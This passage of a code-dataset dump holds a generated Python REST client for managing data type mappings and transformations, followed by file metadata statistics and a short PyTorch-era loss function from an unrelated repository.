(data) = self.delete_transformation_with_http_info(container_id, data_source_id, mapping_id, transformation_id, **kwargs) # noqa: E501
return data
def delete_transformation_with_http_info(self, container_id, data_source_id, mapping_id, transformation_id, **kwargs): # noqa: E501
"""DeleteTransformation # noqa: E501
Delete a transformation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_transformation_with_http_info(container_id, data_source_id, mapping_id, transformation_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:param str transformation_id: (required)
:return: Generic200Response
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['container_id', 'data_source_id', 'mapping_id', 'transformation_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_transformation" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'container_id' is set
if ('container_id' not in params or
params['container_id'] is None):
raise ValueError("Missing the required parameter `container_id` when calling `delete_transformation`") # noqa: E501
# verify the required parameter 'data_source_id' is set
if ('data_source_id' not in params or
params['data_source_id'] is None):
raise ValueError("Missing the required parameter `data_source_id` when calling `delete_transformation`") # noqa: E501
# verify the required parameter 'mapping_id' is set
if ('mapping_id' not in params or
params['mapping_id'] is None):
raise ValueError("Missing the required parameter `mapping_id` when calling `delete_transformation`") # noqa: E501
# verify the required parameter 'transformation_id' is set
if ('transformation_id' not in params or
params['transformation_id'] is None):
raise ValueError("Missing the required parameter `transformation_id` when calling `delete_transformation`") # noqa: E501
collection_formats = {}
path_params = {}
if 'container_id' in params:
path_params['container_id'] = params['container_id'] # noqa: E501
if 'data_source_id' in params:
path_params['data_source_id'] = params['data_source_id'] # noqa: E501
if 'mapping_id' in params:
path_params['mapping_id'] = params['mapping_id'] # noqa: E501
if 'transformation_id' in params:
path_params['transformation_id'] = params['transformation_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['httpBearer'] # noqa: E501
return self.api_client.call_api(
'/containers/{container_id}/import/datasources/{data_source_id}/mappings/{mapping_id}/transformations/{transformation_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Generic200Response', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def export_type_mappings(self, container_id, data_source_id, **kwargs): # noqa: E501
"""ExportTypeMappings # noqa: E501
Export type mappings for a datasource. Providing a JSON body is optional. If provided, the mapping_ids may be specified to indicate certain type mapping IDs to return. Additionally, a target data source may be provided to which the mappings will be copied. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.export_type_mappings(container_id, data_source_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param TypeMappingExportPayload body:
:return: list[TypeMapping]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.export_type_mappings_with_http_info(container_id, data_source_id, **kwargs) # noqa: E501
else:
(data) = self.export_type_mappings_with_http_info(container_id, data_source_id, **kwargs) # noqa: E501
return data
def export_type_mappings_with_http_info(self, container_id, data_source_id, **kwargs): # noqa: E501
"""ExportTypeMappings # noqa: E501
Export type mappings for a datasource. Providing a JSON body is optional. If provided, the mapping_ids may be specified to indicate certain type mapping IDs to return. Additionally, a target data source may be provided to which the mappings will be copied. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.export_type_mappings_with_http_info(container_id, data_source_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param TypeMappingExportPayload body:
:return: list[TypeMapping]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['container_id', 'data_source_id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method export_type_mappings" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'container_id' is set
if ('container_id' not in params or
params['container_id'] is None):
raise ValueError("Missing the required parameter `container_id` when calling `export_type_mappings`") # noqa: E501
# verify the required parameter 'data_source_id' is set
if ('data_source_id' not in params or
params['data_source_id'] is None):
raise ValueError("Missing the required parameter `data_source_id` when calling `export_type_mappings`") # noqa: E501
collection_formats = {}
path_params = {}
if 'container_id' in params:
path_params['container_id'] = params['container_id'] # noqa: E501
if 'data_source_id' in params:
path_params['data_source_id'] = params['data_source_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['httpBearer'] # noqa: E501
return self.api_client.call_api(
'/containers/{container_id}/import/datasources/{data_source_id}/mappings/export', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[TypeMapping]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def import_data_type_mappings(self, container_id, data_source_id, **kwargs): # noqa: E501
"""ImportDataTypeMappings # noqa: E501
Import type mappings for a datasource. Accepts either a JSON body or actual JSON file. The payload should be an array of type mapping classes, previously generated using the export route. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.import_data_type_mappings(container_id, data_source_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param str file:
:return: list[GetDataTypeMappingResponse]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.import_data_type_mappings_with_http_info(container_id, data_source_id, **kwargs) # noqa: E501
else:
(data) = self.import_data_type_mappings_with_http_info(container_id, data_source_id, **kwargs) # noqa: E501
return data
def import_data_type_mappings_with_http_info(self, container_id, data_source_id, **kwargs): # noqa: E501
"""ImportDataTypeMappings # noqa: E501
Import type mappings for a datasource. Accepts either a JSON body or actual JSON file. The payload should be an array of type mapping classes, previously generated using the export route. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.import_data_type_mappings_with_http_info(container_id, data_source_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param str file:
:return: list[GetDataTypeMappingResponse]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['container_id', 'data_source_id', 'file'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method import_data_type_mappings" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'container_id' is set
if ('container_id' not in params or
params['container_id'] is None):
raise ValueError("Missing the required parameter `container_id` when calling `import_data_type_mappings`") # noqa: E501
# verify the required parameter 'data_source_id' is set
if ('data_source_id' not in params or
params['data_source_id'] is None):
raise ValueError("Missing the required parameter `data_source_id` when calling `import_data_type_mappings`") # noqa: E501
collection_formats = {}
path_params = {}
if 'container_id' in params:
path_params['container_id'] = params['container_id'] # noqa: E501
if 'data_source_id' in params:
path_params['data_source_id'] = params['data_source_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'file' in params:
form_params.append(('file', params['file'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['httpBearer'] # noqa: E501
return self.api_client.call_api(
'/containers/{container_id}/import/datasources/{data_source_id}/mappings/import', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[GetDataTypeMappingResponse]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_data_type_mappings(self, container_id, data_source_id, **kwargs): # noqa: E501
"""ListDataTypeMappings # noqa: E501
Lists data type mappings for the data source # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_data_type_mappings(container_id, data_source_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param int limit:
:param int offset:
:param bool needs_transformations: boolean indicating if the return should consist of only mappings that need transformations
:param bool count: boolean indicating if the return value should be a count only
:param str sort_by: column to sort results by
:param bool sort_desc: boolean indicating if results should be in descending order
:param str resulting_metatype_name: if supplied, filters returned transformations by those that produce the resulting metatype
:param str resulting_metatype_relationship_name: if supplied, filters returned transformations by those that produce the resulting metatype relationship
:return: ListDataTypeMappingResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_data_type_mappings_with_http_info(container_id, data_source_id, **kwargs) # noqa: E501
else:
(data) = self.list_data_type_mappings_with_http_info(container_id, data_source_id, **kwargs) # noqa: E501
return data
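# Editorial usage sketch (illustrative only): the optional keyword arguments documented above are
# forwarded as query parameters, e.g. (hypothetical values)
#   api.list_data_type_mappings('container-1', 'datasource-1', limit=50, offset=0,
#                               needs_transformations=True, sort_by='id', sort_desc=True)
# returns a ListDataTypeMappingResponse, and passing count=True requests a count only.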
def list_data_type_mappings_with_http_info(self, container_id, data_source_id, **kwargs): # noqa: E501
"""ListDataTypeMappings # noqa: E501
Lists data type mappings for the data source # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_data_type_mappings_with_http_info(container_id, data_source_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param int limit:
:param int offset:
:param bool needs_transformations: boolean indicating if the return should consist of only mappings that need transformations
:param bool count: boolean indicating if the return value should be a count only
:param str sort_by: column to sort results by
:param bool sort_desc: boolean indicating if results should be in descending order
:param str resulting_metatype_name: if supplied, filters returned transformations by those that produce the resulting metatype
:param str resulting_metatype_relationship_name: if supplied, filters returned transformations by those that produce the resulting metatype relationship
:return: ListDataTypeMappingResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['container_id', 'data_source_id', 'limit', 'offset', 'needs_transformations', 'count', 'sort_by', 'sort_desc', 'resulting_metatype_name', 'resulting_metatype_relationship_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_data_type_mappings" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'container_id' is set
if ('container_id' not in params or
params['container_id'] is None):
raise ValueError("Missing the required parameter `container_id` when calling `list_data_type_mappings`") # noqa: E501
# verify the required parameter 'data_source_id' is set
if ('data_source_id' not in params or
params['data_source_id'] is None):
raise ValueError("Missing the required parameter `data_source_id` when calling `list_data_type_mappings`") # noqa: E501
collection_formats = {}
path_params = {}
if 'container_id' in params:
path_params['container_id'] = params['container_id'] # noqa: E501
if 'data_source_id' in params:
path_params['data_source_id'] = params['data_source_id'] # noqa: E501
query_params = []
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'needs_transformations' in params:
query_params.append(('needsTransformations', params['needs_transformations'])) # noqa: E501
if 'count' in params:
query_params.append(('count', params['count'])) # noqa: E501
if 'sort_by' in params:
query_params.append(('sortBy', params['sort_by'])) # noqa: E501
if 'sort_desc' in params:
query_params.append(('sortDesc', params['sort_desc'])) # noqa: E501
if 'resulting_metatype_name' in params:
query_params.append(('resultingMetatypeName', params['resulting_metatype_name'])) # noqa: E501
if 'resulting_metatype_relationship_name' in params:
query_params.append(('resultingMetatypeRelationshipName', params['resulting_metatype_relationship_name'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['httpBearer'] # noqa: E501
return self.api_client.call_api(
'/containers/{container_id}/import/datasources/{data_source_id}/mappings', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListDataTypeMappingResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_transformations(self, container_id, data_source_id, mapping_id, **kwargs): # noqa: E501
"""ListTransformations # noqa: E501
List transformations for a type mapping from storage. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_transformations(container_id, data_source_id, mapping_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:return: ListTransformationResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_transformations_with_http_info(container_id, data_source_id, mapping_id, **kwargs) # noqa: E501
else:
(data) = self.list_transformations_with_http_info(container_id, data_source_id, mapping_id, **kwargs) # noqa: E501
return data
def list_transformations_with_http_info(self, container_id, data_source_id, mapping_id, **kwargs): # noqa: E501
"""ListTransformations # noqa: E501
List transformations for a type mapping from storage. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_transformations_with_http_info(container_id, data_source_id, mapping_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:return: ListTransformationResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['container_id', 'data_source_id', 'mapping_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_transformations" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'container_id' is set
if ('container_id' not in params or
params['container_id'] is None):
raise ValueError("Missing the required parameter `container_id` when calling `list_transformations`") # noqa: E501
# verify the required parameter 'data_source_id' is set
if ('data_source_id' not in params or
params['data_source_id'] is None):
raise ValueError("Missing the required parameter `data_source_id` when calling `list_transformations`") # noqa: E501
# verify the required parameter 'mapping_id' is set
if ('mapping_id' not in params or
params['mapping_id'] is None):
raise ValueError("Missing the required parameter `mapping_id` when calling `list_transformations`") # noqa: E501
collection_formats = {}
path_params = {}
if 'container_id' in params:
path_params['container_id'] = params['container_id'] # noqa: E501
if 'data_source_id' in params:
path_params['data_source_id'] = params['data_source_id'] # noqa: E501
if 'mapping_id' in params:
path_params['mapping_id'] = params['mapping_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['httpBearer'] # noqa: E501
return self.api_client.call_api(
'/containers/{container_id}/import/datasources/{data_source_id}/mappings/{mapping_id}/transformations', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListTransformationResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def retrieve_data_type_mapping(self, container_id, data_source_id, mapping_id, **kwargs): # noqa: E501
"""RetrieveDataTypeMapping # noqa: E501
Retrieve a data type mapping # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retrieve_data_type_mapping(container_id, data_source_id, mapping_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:return: GetDataTypeMappingResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.retrieve_data_type_mapping_with_http_info(container_id, data_source_id, mapping_id, **kwargs) # noqa: E501
else:
(data) = self.retrieve_data_type_mapping_with_http_info(container_id, data_source_id, mapping_id, **kwargs) # noqa: E501
return data
def retrieve_data_type_mapping_with_http_info(self, container_id, data_source_id, mapping_id, **kwargs): # noqa: E501
"""RetrieveDataTypeMapping # noqa: E501
Retrieve a data type mapping # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retrieve_data_type_mapping_with_http_info(container_id, data_source_id, mapping_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:return: GetDataTypeMappingResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['container_id', 'data_source_id', 'mapping_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method retrieve_data_type_mapping" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'container_id' is set
if ('container_id' not in params or
params['container_id'] is None):
raise ValueError("Missing the required parameter `container_id` when calling `retrieve_data_type_mapping`") # noqa: E501
# verify the required parameter 'data_source_id' is set
if ('data_source_id' not in params or
params['data_source_id'] is None):
raise ValueError("Missing the required parameter `data_source_id` when calling `retrieve_data_type_mapping`") # noqa: E501
# verify the required parameter 'mapping_id' is set
if ('mapping_id' not in params or
params['mapping_id'] is None):
raise ValueError("Missing the required parameter `mapping_id` when calling `retrieve_data_type_mapping`") # noqa: E501
collection_formats = {}
path_params = {}
if 'container_id' in params:
path_params['container_id'] = params['container_id'] # noqa: E501
if 'data_source_id' in params:
path_params['data_source_id'] = params['data_source_id'] # noqa: E501
if 'mapping_id' in params:
path_params['mapping_id'] = params['mapping_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['httpBearer'] # noqa: E501
return self.api_client.call_api(
'/containers/{container_id}/import/datasources/{data_source_id}/mappings/{mapping_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetDataTypeMappingResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_data_type_mapping(self, container_id, data_source_id, mapping_id, **kwargs): # noqa: E501
"""UpdateDataTypeMapping # noqa: E501
Updates a data type mapping. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_data_type_mapping(container_id, data_source_id, mapping_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:param TypeMapping body:
:return: UpdateDataTypeMappingResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_data_type_mapping_with_http_info(container_id, data_source_id, mapping_id, **kwargs) # noqa: E501
else:
(data) = self.update_data_type_mapping_with_http_info(container_id, data_source_id, mapping_id, **kwargs) # noqa: E501
return data
def update_data_type_mapping_with_http_info(self, container_id, data_source_id, mapping_id, **kwargs): # noqa: E501
"""UpdateDataTypeMapping # noqa: E501
Updates a data type mapping. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_data_type_mapping_with_http_info(container_id, data_source_id, mapping_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:param TypeMapping body:
:return: UpdateDataTypeMappingResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['container_id', 'data_source_id', 'mapping_id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_data_type_mapping" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'container_id' is set
if ('container_id' not in params or
params['container_id'] is None):
raise ValueError("Missing the required parameter `container_id` when calling `update_data_type_mapping`") # noqa: E501
# verify the required parameter 'data_source_id' is set
if ('data_source_id' not in params or
params['data_source_id'] is None):
raise ValueError("Missing the required parameter `data_source_id` when calling `update_data_type_mapping`") # noqa: E501
# verify the required parameter 'mapping_id' is set
if ('mapping_id' not in params or
params['mapping_id'] is None):
raise ValueError("Missing the required parameter `mapping_id` when calling `update_data_type_mapping`") # noqa: E501
collection_formats = {}
path_params = {}
if 'container_id' in params:
path_params['container_id'] = params['container_id'] # noqa: E501
if 'data_source_id' in params:
path_params['data_source_id'] = params['data_source_id'] # noqa: E501
if 'mapping_id' in params:
path_params['mapping_id'] = params['mapping_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['httpBearer'] # noqa: E501
return self.api_client.call_api(
'/containers/{container_id}/import/datasources/{data_source_id}/mappings/{mapping_id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UpdateDataTypeMappingResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_transformation(self, body, container_id, data_source_id, mapping_id, transformation_id, **kwargs): # noqa: E501
"""UpdateTransformation # noqa: E501
Update a transformation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_transformation(body, container_id, data_source_id, mapping_id, transformation_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CreateTypeMappingTransformationsRequest body: (required)
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:param str transformation_id: (required)
:return: UpdateTransformationResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_transformation_with_http_info(body, container_id, data_source_id, mapping_id, transformation_id, **kwargs) # noqa: E501
else:
(data) = self.update_transformation_with_http_info(body, container_id, data_source_id, mapping_id, transformation_id, **kwargs) # noqa: E501
return data
def update_transformation_with_http_info(self, body, container_id, data_source_id, mapping_id, transformation_id, **kwargs): # noqa: E501
"""UpdateTransformation # noqa: E501
Update a transformation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_transformation_with_http_info(body, container_id, data_source_id, mapping_id, transformation_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CreateTypeMappingTransformationsRequest body: (required)
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:param str transformation_id: (required)
:return: UpdateTransformationResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'container_id', 'data_source_id', 'mapping_id', 'transformation_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_transformation" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_transformation`") # noqa: E501
# verify the required parameter 'container_id' is set
if ('container_id' not in params or
params['container_id'] is None):
raise ValueError("Missing the required parameter `container_id` when calling `update_transformation`") # noqa: E501
# verify the required parameter 'data_source_id' is set
if ('data_source_id' not in params or
params['data_source_id'] is None):
raise ValueError("Missing the required parameter `data_source_id` when calling `update_transformation`") # noqa: E501
# verify the required parameter 'mapping_id' is set
if ('mapping_id' not in params or
params['mapping_id'] is None):
raise ValueError("Missing the required parameter `mapping_id` when calling `update_transformation`") # noqa: E501
# verify the required parameter 'transformation_id' is set
if ('transformation_id' not in params or
params['transformation_id'] is None):
raise ValueError("Missing the required parameter `transformation_id` when calling `update_transformation`") # noqa: E501
collection_formats = {}
path_params = {}
if 'container_id' in params:
path_params['container_id'] = params['container_id'] # noqa: E501
if 'data_source_id' in params:
path_params['data_source_id'] = params['data_source_id'] # noqa: E501
if 'mapping_id' in params:
path_params['mapping_id'] = params['mapping_id'] # noqa: E501
if 'transformation_id' in params:
path_params['transformation_id'] = params['transformation_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['httpBearer'] # noqa: E501
return self.api_client.call_api(
'/containers/{container_id}/import/datasources/{data_source_id}/mappings/{mapping_id}/transformations/{transformation_id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UpdateTransformationResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
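# --- Usage sketch (assumption: illustrative only, not generated code) ------
# The methods above all follow the same swagger-codegen convention: calls are
# synchronous by default and return the response model directly; passing
# async_req=True returns a thread-like handle whose .get() yields the result.
# The `api` argument below stands for an instance of the generated API class
# that owns these methods; its construction is omitted here.
def _list_mappings_example(api, container_id, data_source_id):
    # synchronous call: returns a ListDataTypeMappingResponse
    mappings = api.list_data_type_mappings(container_id, data_source_id, limit=100)
    # asynchronous call: returns the request thread; .get() blocks for the result
    thread = api.list_data_type_mappings(container_id, data_source_id, async_req=True)
    return mappings, thread.get()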
| 47.700658
| 1,455
| 0.647455
| 6,816
| 58,004
| 5.240757
| 0.051643
| 0.044792
| 0.057109
| 0.041152
| 0.934996
| 0.927914
| 0.92405
| 0.920495
| 0.919263
| 0.918703
| 0
| 0.014778
| 0.267378
| 58,004
| 1,215
| 1,456
| 47.739918
| 0.825815
| 0.345287
| 0
| 0.783784
| 0
| 0
| 0.265706
| 0.086068
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031532
| false
| 0
| 0.031532
| 0
| 0.10961
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0 | 8 | f41e2e640a9aa2a089cf5436a377f319e2900b02 | 14,899 | py | Python | torch_optimizer.py | antoniobarbalau/black-box-ripper | f461e140979bf43200bd4ec6872731f07a2ca15f | [ "CC0-1.0" ] | 22 | 2020-10-30T02:36:44.000Z | 2022-03-21T12:56:45.000Z | torch_optimizer.py | antoniobarbalau/black-box-ripper | f461e140979bf43200bd4ec6872731f07a2ca15f | [ "CC0-1.0" ] | 1 | 2021-04-06T15:12:22.000Z | 2021-04-24T11:51:22.000Z | torch_optimizer.py | antoniobarbalau/black-box-ripper | f461e140979bf43200bd4ec6872731f07a2ca15f | [ "CC0-1.0" ] | 2 | 2021-05-27T02:16:54.000Z | 2021-09-03T23:34:09.000Z |
import numpy as np
import torch
import setup
def loss(softmax, image, label):
softmax = np.exp(softmax) / np.sum(np.exp(softmax))
return np.sum(np.power(
softmax -
np.eye(10)[label],
2
))
